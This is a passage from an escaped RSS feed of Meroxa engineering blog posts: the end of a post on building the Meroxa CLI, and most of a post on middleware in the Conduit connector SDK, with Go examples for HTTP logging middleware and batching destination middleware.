&lt;p&gt;Any command that implements the &lt;code class=&quot;language-text&quot;&gt;CommandWithConfirmWithValue&lt;/code&gt; interface requires the given argument to be provided a second time, unless the &lt;code class=&quot;language-text&quot;&gt;--force&lt;/code&gt; flag is used. Example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;
&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;ValueToConfirm&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;wantInput &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;args&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;NameOrUUID
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;strong&gt;Documentation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In line with what’s been mentioned on several occasions in this blog post is the need to automate as much as possible. Cobra provides the ability to &lt;a href=&quot;https://github.com/meroxa/cli/blob/master/Makefile#L26-L32&quot;&gt;generate documentation automatically&lt;/a&gt;, and we do so in a specific format so it’s live in &lt;a href=&quot;https://docs.meroxa.com/&quot;&gt;our public documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For every change we can communicate externally, we present it in a &lt;a href=&quot;https://docs.meroxa.com/changelog/tags/cli&quot;&gt;changelog&lt;/a&gt; so our customers can keep up with announcements they might be interested in.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Keep your users using the latest&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Our Platform is expected to release new features often, and we need to make customers aware of &lt;a href=&quot;https://docs.meroxa.com/changelog/2022-05-27-meroxa-cli-v-2-2-0&quot;&gt;this&lt;/a&gt; so they upgrade quickly. At Meroxa, we accomplish this by presenting a warning if they haven’t upgraded within the last week:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;
$ meroxa &lt;span class=&quot;token function&quot;&gt;whoami&lt;/span&gt; 
raul@meroxa.io
  🎁 meroxa v2.8.1 is available&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; Update it by running: &lt;span class=&quot;token variable&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;`&lt;/span&gt;brew upgrade meroxa&lt;span class=&quot;token variable&quot;&gt;`&lt;/span&gt;&lt;/span&gt;
  🧐 Check out latest changes &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; https://github.com/meroxa/cli/releases/tag/v2.8.1
  💡 To disable these warnings, run &lt;span class=&quot;token variable&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;`&lt;/span&gt;meroxa config &lt;span class=&quot;token builtin class-name&quot;&gt;set&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;DISABLE_NOTIFICATIONS_UPDATE&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;true&lt;span class=&quot;token variable&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;strong&gt;Always aim for a good Developer Experience&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Among all the features we’ve considered adding to our CLI, one bucket is always high on our list: improving its user experience, even if that means supporting other external tools.&lt;/p&gt;
&lt;p&gt;For example, we recently integrated with &lt;a href=&quot;https://fig.io/&quot;&gt;Fig&lt;/a&gt; and &lt;a href=&quot;https://www.warp.dev/&quot;&gt;Warp&lt;/a&gt; to improve autocomplete and resource workflows as mentioned in the following changelogs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/changelog/2022-08-18-meroxa-cli-and-fig/&quot;&gt;Fig&apos;s changelog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/changelog/2022-09-01-meroxa-cli-and-warp/&quot;&gt;Warp&apos;s changelog&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Developing a CLI is a very exciting journey. The speed of interacting programmatically with a Platform is difficult to beat when you’re using a terminal. With this blog post, I hope I gave you some ideas on how to approach your own CLI development. If that’s the case, I highly recommend giving this a read: &lt;a href=&quot;https://clig.dev/&quot;&gt;https://clig.dev/&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Have questions or want to chat about the process? I’ll be happy to help on &lt;a href=&quot;https://discord.com/channels/828680256877363200/828680256877363206&quot;&gt;our Discord channel&lt;/a&gt;, or reach out via &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Middleware for Conduit Connectors Improves Developer Experience]]></title><description><![CDATA[Connector Middleware improves the developer experience. You can utilize middleware provided by the SDK to enrich the functionality of connectors without reinventing the wheel.]]></description><link>https://meroxa.com/blog/middleware-for-conduit-connectors-improves-developer-experience</link><guid isPermaLink="false">https://meroxa.com/blog/middleware-for-conduit-connectors-improves-developer-experience</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Wed, 05 Oct 2022 14:47:21 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; v0.3.0 was recently released and brought lots of useful features that make the user as well as the developer experience nicer and simpler. One of these features is connector middleware in the &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;connector SDK&lt;/a&gt;. In this blog post we will explain what middleware is, why we added it, how it solves our problems, and how to use it yourself.&lt;/p&gt;
&lt;h2&gt;The problem we faced&lt;/h2&gt;
&lt;p&gt;Before we dive into middleware, let’s first give you some context around Conduit and the problem we faced.&lt;/p&gt;
&lt;p&gt;Conduit is a data integration tool that uses connectors to fetch data from and write data to third-party systems. A connector is a plugin that runs in its own process and follows the prescribed &lt;a href=&quot;https://github.com/conduitio/conduit-connector-protocol&quot;&gt;connector protocol&lt;/a&gt;. We use protocol buffers and gRPC to define the interface used in the connector protocol. On one hand, this gives us the flexibility to write connectors in any programming language, but on the other hand, it requires the connector developer to deal with the complexity of gRPC streams and write a lot of boilerplate code themselves. Because we want to make the developer experience better and standardize the behavior of connectors as much as possible we provide a &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;connector SDK&lt;/a&gt; for connectors written in Go. The SDK hides the complexity, implements common boilerplate code, provides utilities for implementing a connector, and allows the developer to focus on writing the connector functionality without worrying about the protocol.&lt;/p&gt;
&lt;p&gt;After implementing more than &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/connectors.md&quot;&gt;25 connectors&lt;/a&gt; it became clear that there was still room for improvement in terms of reducing duplicated code found in multiple connectors. We saw repeated code in some connectors that needed the same functionality, like rate limiting or batching. The problem we faced is that these features are not applicable to all connectors, so we can’t bake them into the SDK and enable them for all connectors. Furthermore, even if connectors require the same functionality, they may expect different default values to configure the functionality (e.g. default batch size).&lt;/p&gt;
&lt;p&gt;To solve this problem, we came up with the following requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We want to be able to add features that are needed across all connectors (e.g. batching).&lt;/li&gt;
&lt;li&gt;These added features need to be configurable by the end-user.&lt;/li&gt;
&lt;li&gt;Connector developers should be in control of adding or opting out of a feature in their connector (no hidden logic).&lt;/li&gt;
&lt;li&gt;There should be a default set of features, so we can add more in the future and easily roll them out to all connectors.&lt;/li&gt;
&lt;li&gt;Connector developers should be able to choose the defaults for these features in their connector.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Fulfilling these requirements brings many benefits: it further standardizes the behavior of connectors, cuts down on code duplication, and in the long run it will help us reduce the number of bugs and make our connectors easier to maintain.&lt;/p&gt;
&lt;h2&gt;Middleware&lt;/h2&gt;
&lt;p&gt;As soon as we had a clear list of requirements, a lightbulb went off in our heads - we needed to introduce middleware!&lt;/p&gt;
&lt;p&gt;What is middleware, you ask? The term means different things to different people. Some may think of OS middleware that extends the functionality of an operating system; others might think of middleware as services in the context of distributed applications. Regardless of the specific middleware you think of, one thing is true for all: as the name suggests, it’s a piece of software that sits &lt;em&gt;in the middle&lt;/em&gt; of two components and provides additional functionality. You can imagine middleware like augmented reality glasses - they allow the wearer to see and interact with their environment as before while providing additional information on top.&lt;/p&gt;
&lt;p&gt;In this post we use the term middleware to describe a piece of code that functions like a wrapper around an object and forwards calls to the underlying object while manipulating the parameters and/or return values. It’s common that the underlying object implements a certain interface so that the middleware does not have to be aware of what specific object it is wrapping. The middleware in turn also implements the same interface, so that a wrapped object can still be used through that interface.&lt;/p&gt;
&lt;p&gt;Perhaps the most common use of the middleware pattern in Go is with HTTP handlers. It’s common practice to wrap &lt;code class=&quot;language-text&quot;&gt;http.Handler&lt;/code&gt; objects with middleware that adds functionality like logging or authentication. Here’s an example of HTTP middleware in Go:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;log&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;net/http&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;loggingMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;next http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Handler&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Handler &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;HandlerFunc&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;w http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResponseWriter&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Request&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;received request&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		next&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ServeHTTP&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;w&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;send response&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;hello&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;w http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResponseWriter&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Request&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	w&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;byte&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;hello&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	handler &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;HandlerFunc&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;hello&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ListenAndServe&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;:8080&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;loggingMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;handler&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Fatal&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice that &lt;code class=&quot;language-text&quot;&gt;loggingMiddleware&lt;/code&gt; is unaware of which &lt;code class=&quot;language-text&quot;&gt;http.Handler&lt;/code&gt; it is wrapping. Since the middleware itself is an &lt;code class=&quot;language-text&quot;&gt;http.Handler&lt;/code&gt;, it can even wrap another middleware (chaining middleware is also common practice). The base functionality of the HTTP handler stays the same; the middleware forwards the call while executing some operations before and after it.&lt;/p&gt;
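&lt;p&gt;Chaining can be demonstrated without a real HTTP server. The sketch below is illustrative only: it uses a simplified &lt;code class=&quot;language-text&quot;&gt;Handler&lt;/code&gt; type as a stand-in for &lt;code class=&quot;language-text&quot;&gt;http.Handler&lt;/code&gt; so the example stays self-contained, and it records the order in which chained middleware runs:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"strings"
)

// Handler is a simplified stand-in for http.Handler; it receives a trace
// of the calls made so far and returns the extended trace.
type Handler func(trace []string) []string

// middleware wraps a Handler, recording an entry before and after the
// wrapped handler runs, just like loggingMiddleware logs around ServeHTTP.
func middleware(name string, next Handler) Handler {
	return func(trace []string) []string {
		trace = append(trace, name+" before")
		trace = next(trace)
		return append(trace, name+" after")
	}
}

// chainDemo wraps a base handler in two middlewares and returns the
// resulting call order as a single string.
func chainDemo() string {
	base := Handler(func(trace []string) []string {
		return append(trace, "handler")
	})
	// The outer middleware wraps the inner one, which wraps the handler.
	wrapped := middleware("outer", middleware("inner", base))
	return strings.Join(wrapped(nil), ", ")
}

func main() {
	fmt.Println(chainDemo())
	// outer before, inner before, handler, inner after, outer after
}
```

&lt;p&gt;The call order shows why chaining works: each middleware sees only the handler it wraps, yet the before/after hooks nest correctly.&lt;/p&gt;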
&lt;h2&gt;How Connector Middleware solves our problem&lt;/h2&gt;
&lt;p&gt;The middleware pattern checks all the boxes of our requirements list. Let’s go through them one by one.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We want to be able to add features that are needed across all connectors.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is exactly what middleware does: it adds functionality without changing the basic behavior. It can be applied to any object that implements a certain interface; in our case, the interfaces are &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Source&quot;&gt;Source&lt;/a&gt; and &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Destination&quot;&gt;Destination&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;These added features need to be configurable by the end-user.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Source&quot;&gt;Source&lt;/a&gt; and &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Destination&quot;&gt;Destination&lt;/a&gt; interfaces define how the connector can be configured. The middleware can wrap the function &lt;code class=&quot;language-text&quot;&gt;Parameters&lt;/code&gt; to adjust the specifications and tell the UI to display additional parameters. When the user creates the connector, the configuration is passed to the function &lt;code class=&quot;language-text&quot;&gt;Config&lt;/code&gt;, which can again be wrapped by the middleware to parse the injected parameters.&lt;/p&gt;
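&lt;p&gt;As a rough illustration (the type and method names below are hypothetical, not the actual SDK API), injecting extra parameters by wrapping a &lt;code class=&quot;language-text&quot;&gt;Parameters&lt;/code&gt;-style method could look like this:&lt;/p&gt;

```go
package main

import "fmt"

// Connector is a hypothetical stand-in for the SDK's Source/Destination
// interfaces; only a Parameters-style method is modeled here.
type Connector interface {
	Parameters() map[string]string
}

// base is a plain connector exposing only its own parameters.
type base struct{}

func (base) Parameters() map[string]string {
	return map[string]string{"url": "connection URL"}
}

// withBatch wraps any Connector and injects an additional parameter,
// mirroring how connector middleware extends the specification.
type withBatch struct {
	Connector
}

func (w withBatch) Parameters() map[string]string {
	params := w.Connector.Parameters()
	params["batchSize"] = "maximum number of records in a batch"
	return params
}

func main() {
	var c Connector = withBatch{base{}}
	// The wrapped connector exposes the base parameter plus the injected one.
	fmt.Println(len(c.Parameters()))
}
```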
&lt;p&gt;&lt;strong&gt;Connector developers should be in control of adding or opting out of a feature in their connector.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We were already using a constructor function in our connectors, which is the perfect place to add middleware. The constructor is implemented by the connector developer, so they can choose which middleware to add. Note that we encourage developers to include at least the default middleware unless they have a good reason not to.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;There should be a default set of features, so we can add more in the future and easily roll them out to all connectors.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The SDK provides functions that return the default connector middleware (&lt;code class=&quot;language-text&quot;&gt;DefaultSourceMiddleware&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;DefaultDestinationMiddleware&lt;/code&gt;). All connectors that use the default middleware will automatically benefit from new middleware added in future SDK releases. This ensures that we can further standardize the behavior of our connectors and easily roll out common features.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Connector developers should be able to choose the defaults for these features in their connector.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We solved this by implementing middleware as structs with public fields that hold the default values for the parameters each middleware introduces. The connector developer can set these defaults when adding the middleware to their connector.&lt;/p&gt;
&lt;h2&gt;Example usage&lt;/h2&gt;
&lt;p&gt;Here we will show how easy it is to apply middleware to connectors. We will focus on the &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Destination&quot;&gt;Destination&lt;/a&gt;, although the same principles apply when implementing a &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Source&quot;&gt;Source&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We start with a simple destination struct and a constructor function.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Destination &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;UnimplementedDestination
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NewDestination&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Destination &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// return an instance of Destination&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To add the middleware to the destination, the SDK provides a utility function called &lt;code class=&quot;language-text&quot;&gt;DestinationWithMiddleware&lt;/code&gt;. The SDK also provides the function &lt;code class=&quot;language-text&quot;&gt;DefaultDestinationMiddleware&lt;/code&gt;, which returns a set of default middleware and should be used in most connectors. In future SDK releases we may add more middleware to this set; this way, most connectors will benefit from new middleware simply by updating the SDK version.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Destination &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;UnimplementedDestination
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NewDestination&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Destination &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// return an instance of Destination wrapped in the default middleware&lt;/span&gt;
	destination &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	middleware &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;DefaultDestinationMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;DestinationWithMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;destination&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; middleware&lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If there is a good reason not to use the default middleware (e.g. choosing different defaults or removing a middleware), the developer can freely choose which middleware to apply. For example, this is how we would apply only the batching middleware and set a default batch size of 100.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Destination &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;UnimplementedDestination
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NewDestination&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Destination &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// return an instance of Destination wrapped in custom middleware&lt;/span&gt;
	destination &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	middleware &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DestinationMiddleware&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DestinationWithBatch&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;DefaultBatchSize&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;100&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;DestinationWithMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;destination&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; middleware&lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
